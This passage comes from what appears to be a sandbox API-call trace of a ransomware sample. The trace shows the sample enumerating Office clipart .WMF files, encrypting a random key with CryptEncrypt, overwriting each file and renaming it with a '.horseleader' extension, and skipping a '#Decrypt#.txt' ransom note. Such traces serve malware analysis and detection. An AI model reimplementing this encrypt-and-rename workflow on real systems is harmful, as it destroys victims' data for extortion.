ftCreationTime.dwHighDateTime=0x1bd4c0e, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9936cb00, ftLastWriteTime.dwHighDateTime=0x1bd4c0e, nFileSizeHigh=0x0, nFileSizeLow=0x2174, 
dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01186_.WMF", cAlternateFileName="")) returned 1 [0254.597] lstrcmpiW (lpString1="DD01186_.WMF", lpString2="Windows") returned -1 [0254.597] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 67 [0254.597] StrStrIW (lpFirst="DD01186_.WMF", lpSrch=".horseleader") returned 0x0 [0254.597] lstrcmpW (lpString1="DD01186_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.597] lstrcmpW (lpString1="DD01186_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.597] lstrlenW (lpString=".testttjffg") returned 11 [0254.597] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.597] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.597] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.597] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.598] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 67 [0254.598] StrStrW (lpFirst="DD01186_.WMF", lpSrch=".txt") returned 0x0 [0254.598] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8564) returned 1 [0254.598] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesRead=0x32aedf4*=0x2174, lpOverlapped=0x0) returned 1 [0254.606] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffde8c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.606] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2174, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2174, lpOverlapped=0x0) returned 1 [0254.607] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.607] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.607] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.607] CloseHandle (hObject=0x158) returned 1 [0254.607] GetProcessHeap () returned 0x780000 [0254.607] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.607] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.horseleader") returned 79 [0254.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf.horseleader")) returned 1 [0254.608] GetProcessHeap () returned 0x780000 [0254.608] HeapFree (in: hHeap=0x780000, dwFlags=0x0, 
lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.608] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4fe9900, ftCreationTime.dwHighDateTime=0x1c7a766, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4fe9900, ftLastWriteTime.dwHighDateTime=0x1c7a766, nFileSizeHigh=0x0, nFileSizeLow=0x6e8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01366_.WMF", cAlternateFileName="")) returned 1 [0254.608] lstrcmpiW (lpString1="DD01366_.WMF", lpString2="Windows") returned -1 [0254.608] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 67 [0254.608] StrStrIW (lpFirst="DD01366_.WMF", lpSrch=".horseleader") returned 0x0 [0254.608] lstrcmpW (lpString1="DD01366_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.608] lstrcmpW (lpString1="DD01366_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.608] lstrlenW (lpString=".testttjffg") returned 11 [0254.608] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.608] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.609] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.609] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0255.095] lstrlenW 
(lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 67 [0255.095] StrStrW (lpFirst="DD01366_.WMF", lpSrch=".txt") returned 0x0 [0255.095] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1768) returned 1 [0255.095] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x6e8, lpOverlapped=0x0) returned 1 [0255.103] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff918, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0255.103] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x6e8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x6e8, lpOverlapped=0x0) returned 1 [0255.106] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0255.106] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0255.106] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0255.106] CloseHandle (hObject=0x158) returned 1 [0255.106] GetProcessHeap () returned 0x780000 [0255.106] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0255.106] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.horseleader") returned 79 [0255.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf.horseleader")) returned 1 [0255.114] GetProcessHeap () returned 0x780000 [0255.115] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0255.115] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81594a00, ftCreationTime.dwHighDateTime=0x1bd4c02, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81594a00, ftLastWriteTime.dwHighDateTime=0x1bd4c02, nFileSizeHigh=0x0, nFileSizeLow=0x384, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01434_.WMF", cAlternateFileName="")) returned 1 [0255.115] lstrcmpiW (lpString1="DD01434_.WMF", lpString2="Windows") returned -1 [0255.115] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 67 [0255.115] StrStrIW (lpFirst="DD01434_.WMF", lpSrch=".horseleader") returned 0x0 [0255.115] lstrcmpW (lpString1="DD01434_.WMF", lpString2="#Decrypt#.txt") returned 1 [0255.115] lstrcmpW (lpString1="DD01434_.WMF", lpString2="_uninstalling_.png") returned 1 [0255.115] lstrlenW (lpString=".testttjffg") returned 11 [0255.115] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF", lpSrch=".testttjffg") returned 0x0 [0255.115] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0255.115] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0255.115] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0255.117] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 67 [0255.117] StrStrW (lpFirst="DD01434_.WMF", lpSrch=".txt") returned 0x0 [0255.117] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=900) returned 1 [0255.117] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x384, lpOverlapped=0x0) returned 1 [0255.176] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0255.176] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x384, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x384, lpOverlapped=0x0) returned 1 [0255.176] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0255.176] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0255.176] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0255.176] CloseHandle 
(hObject=0x158) returned 1 [0255.177] GetProcessHeap () returned 0x780000 [0255.177] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0255.177] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.horseleader") returned 79 [0255.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf.horseleader")) returned 1 [0255.178] GetProcessHeap () returned 0x780000 [0255.178] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0255.178] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55829800, ftCreationTime.dwHighDateTime=0x1bd4bf3, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x55829800, ftLastWriteTime.dwHighDateTime=0x1bd4bf3, nFileSizeHigh=0x0, nFileSizeLow=0x9dc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01585_.WMF", cAlternateFileName="")) returned 1 [0255.178] lstrcmpiW (lpString1="DD01585_.WMF", lpString2="Windows") returned -1 [0255.178] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 67 [0255.178] StrStrIW (lpFirst="DD01585_.WMF", lpSrch=".horseleader") returned 0x0 [0255.178] lstrcmpW (lpString1="DD01585_.WMF", lpString2="#Decrypt#.txt") returned 1 [0255.178] lstrcmpW (lpString1="DD01585_.WMF", lpString2="_uninstalling_.png") returned 1 [0255.178] lstrlenW 
(lpString=".testttjffg") returned 11 [0255.178] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF", lpSrch=".testttjffg") returned 0x0 [0255.178] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0255.179] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0255.179] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0255.179] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 67 [0255.179] StrStrW (lpFirst="DD01585_.WMF", lpSrch=".txt") returned 0x0 [0255.179] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2524) returned 1 [0255.180] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x9dc, lpOverlapped=0x0) returned 1 [0255.182] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff624, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0255.182] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x9dc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x9dc, lpOverlapped=0x0) returned 1 [0255.182] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0255.182] WriteFile (in: hFile=0x158, 
lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0255.182] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0255.182] CloseHandle (hObject=0x158) returned 1 [0255.182] GetProcessHeap () returned 0x780000 [0255.182] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0255.182] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.horseleader") returned 79 [0255.183] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf.horseleader")) returned 1 [0255.183] GetProcessHeap () returned 0x780000 [0255.184] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0255.184] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bf93000, ftCreationTime.dwHighDateTime=0x1bd4bf3, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4bf93000, ftLastWriteTime.dwHighDateTime=0x1bd4bf3, nFileSizeHigh=0x0, nFileSizeLow=0x914, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01586_.WMF", cAlternateFileName="")) returned 1 [0255.184] lstrcmpiW (lpString1="DD01586_.WMF", lpString2="Windows") returned -1 [0255.184] 
wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 67 [0255.184] StrStrIW (lpFirst="DD01586_.WMF", lpSrch=".horseleader") returned 0x0 [0255.184] lstrcmpW (lpString1="DD01586_.WMF", lpString2="#Decrypt#.txt") returned 1 [0255.184] lstrcmpW (lpString1="DD01586_.WMF", lpString2="_uninstalling_.png") returned 1 [0255.184] lstrlenW (lpString=".testttjffg") returned 11 [0255.184] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF", lpSrch=".testttjffg") returned 0x0 [0255.184] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0255.184] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0255.184] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0255.185] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 67 [0255.185] StrStrW (lpFirst="DD01586_.WMF", lpSrch=".txt") returned 0x0 [0255.185] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2324) returned 1 [0255.185] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x914, lpOverlapped=0x0) returned 1 [0255.186] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff6ec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0255.186] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x914, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x914, lpOverlapped=0x0) returned 1 [0255.187] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0255.187] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0255.187] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0255.187] CloseHandle (hObject=0x158) returned 1 [0255.187] GetProcessHeap () returned 0x780000 [0255.187] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0255.187] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.horseleader") returned 79 [0255.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf.horseleader")) returned 1 [0255.188] GetProcessHeap () returned 0x780000 [0255.188] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0255.188] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf28f0200, 
ftCreationTime.dwHighDateTime=0x1bd4bee, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf28f0200, ftLastWriteTime.dwHighDateTime=0x1bd4bee, nFileSizeHigh=0x0, nFileSizeLow=0x4a7c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01628_.WMF", cAlternateFileName="")) returned 1 [0255.188] lstrcmpiW (lpString1="DD01628_.WMF", lpString2="Windows") returned -1 [0255.188] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 67 [0255.188] StrStrIW (lpFirst="DD01628_.WMF", lpSrch=".horseleader") returned 0x0 [0255.188] lstrcmpW (lpString1="DD01628_.WMF", lpString2="#Decrypt#.txt") returned 1 [0255.188] lstrcmpW (lpString1="DD01628_.WMF", lpString2="_uninstalling_.png") returned 1 [0255.188] lstrlenW (lpString=".testttjffg") returned 11 [0255.188] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF", lpSrch=".testttjffg") returned 0x0 [0255.188] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0255.188] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0255.188] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0255.189] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 67 [0255.189] StrStrW (lpFirst="DD01628_.WMF", lpSrch=".txt") returned 0x0 [0255.189] GetFileSizeEx (in: hFile=0x158, 
